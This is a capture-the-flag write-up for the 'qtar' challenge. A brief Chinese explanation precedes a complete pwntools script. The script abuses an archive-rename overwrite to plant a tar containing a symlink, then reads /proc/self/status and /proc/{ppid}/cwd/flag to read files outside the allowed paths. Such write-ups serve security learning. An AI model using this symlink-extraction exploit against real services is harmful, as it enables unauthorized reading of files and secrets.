
roarctf2020_qtar

通过盲打测试，可以发现在 compress 的 rename 时可以覆盖掉已经存在的文件。这样，我们就可以使自己上传的文件被打上标记，从而能够对自己上传的压缩包进行解压。通过提示功能知道 flag 在 /home/ctf/flag，于是考虑在本地制造一个软链接文件，然后压缩成 tar，这样在远程解压时就会创建该链接。然后我们就可以读取文件内容了，但发现 /home 路径被 ban 了。于是先读取 /proc/self/status 得到父进程的 pid，这样就可以通过 /proc/{ppid}/cwd 去访问 /home/ctf 目录。

#coding:utf8
import os
import tarfile

from pwn import *
# Single tube to the challenge service; every helper below sends and reads on it.
sh = remote(host='47.104.178.87', port=35360)

def upload(content):
    """Send *content* through the 'u' menu entry and return the server-side name.

    The service answers with 'File uploaded as /tmp/<name>'; only <name>
    (no directory, no trailing newline) is returned, which is the form the
    'Filename: /tmp/' prompt in compress() expects.
    """
    for prompt, answer in (('>', 'u'), ('Content:', content)):
        sh.sendlineafter(prompt, answer)
    sh.recvuntil('File uploaded as /tmp/')
    return sh.recvuntil('\n', drop=True)

def compress(name, rename=''):
    """Compress /tmp/<name> via the 'c' menu entry and return the archive name.

    An empty *rename* answers the 'Rename archive file?' prompt with 'N'.
    Any other value answers 'y' and is sent as the Arcname; the writeup
    relies on this to overwrite an archive name that already exists.
    Returns whatever follows 'File compressed as ' on the response line.
    """
    sh.sendlineafter('>', 'c')
    sh.sendlineafter('Filename: /tmp/', name)
    wants_rename = rename != ''
    sh.sendlineafter('Rename archive file? [y/N]', 'y' if wants_rename else 'N')
    if wants_rename:
        print('rename {}'.format(rename))
        sh.sendlineafter('Arcname:', rename)
    sh.recvuntil('File compressed as ')
    return sh.recvuntil('\n', drop=True)

def extract(name):
    """Ask the service ('x' menu entry) to extract archive *name*.

    Nothing is read back here; the service's reply stays in the tube and is
    skipped by the next sendlineafter('>', ...).
    """
    for prompt, answer in (('>', 'x'), ('Filename:', name)):
        sh.sendlineafter(prompt, answer)

def readf(name):
    """Ask the service ('r' menu entry) to print file *name*.

    The contents are not consumed here; the caller reads them from the tube
    (see the 'PPid:' parsing after watch()).
    """
    for prompt, answer in (('>', 'r'), ('Filename:', name)):
        sh.sendlineafter(prompt, answer)

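def watch(file):
    """Make the service print *file* by extracting an archive whose only member is a symlink.

    Order of operations (each remote step goes through the helpers above):
      1. locally build ff.tar holding the symlink ff -> *file*;
      2. upload ff.tar (a) and a dummy file (b); compress the dummy (b_c);
      3. compress a renamed to b_c, so our tar takes the place of an archive
         the service produced itself, then extract a_c and b_c -- extracting
         our tar creates the symlink ff on the server;
      4. compress a under the name 'ff' and read 'ff', which now resolves
         to *file*; the caller parses the printed contents from the tube.

    NOTE(review): the pasted code lost its indentation; this body is
    reconstructed as the block ending at readf('ff') because the caller
    reads 'PPid:' right after each watch() call -- confirm against the
    original.  The archive member is stored as a symlink (TarFile.dereference
    is False), which an extractor that does not validate link targets will
    recreate; tarfile.extractall(filter='data') (3.12+ and backports) refuses
    such members, so hardened services will not reproduce this step.
    """
    link = 'ff'
    # Start from a clean link each call; removing a symlink never touches its target.
    if os.path.lexists(link):
        os.remove(link)
    os.symlink(file, link)
    # stdlib instead of `tar -cvpf` via os.system: no shell string is built from *file*
    # and a failure raises instead of being ignored.
    with tarfile.open('ff.tar', 'w') as archive:
        archive.add(link)

    with open('ff.tar', 'rb') as fh:
        content = fh.read()
    a = upload(content)

    b = upload('haivk')
    b_c = compress(b)

    a_c = compress(a, b_c)
    extract(a_c)

    # Extract the tar we uploaded ourselves (creates the ff symlink remotely).
    extract(b_c)

    # Original comment: "change permission" -- compressing a under the name ff
    # is what lets readf('ff') be accepted; the exact server-side reason is not
    # visible here.
    compress(a, 'ff')
    readf('ff')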

#context.log_level = 'debug'
# Step 1: have the service print /proc/self/status and pull the parent pid
# from its 'PPid:' line.
watch('/proc/self/status')
sh.recvuntil('PPid:')
ppid_text = sh.recvuntil('\n', drop=True)
ppid = int(ppid_text)  # int() ignores the whitespace that follows 'PPid:'
print(ppid)
# Step 2: the writeup says /home is blocked, so reach the flag through the
# parent process's cwd instead.
watch('/proc/{}/cwd/flag'.format(ppid))

sh.interactive()